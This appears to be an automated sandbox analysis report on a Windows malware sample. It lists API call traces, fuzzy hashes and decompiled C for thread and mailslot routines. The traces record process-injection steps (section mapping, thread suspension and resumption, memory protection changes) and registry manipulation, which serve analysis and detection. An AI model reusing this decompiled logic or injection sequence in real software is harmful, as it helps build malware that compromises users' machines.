    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
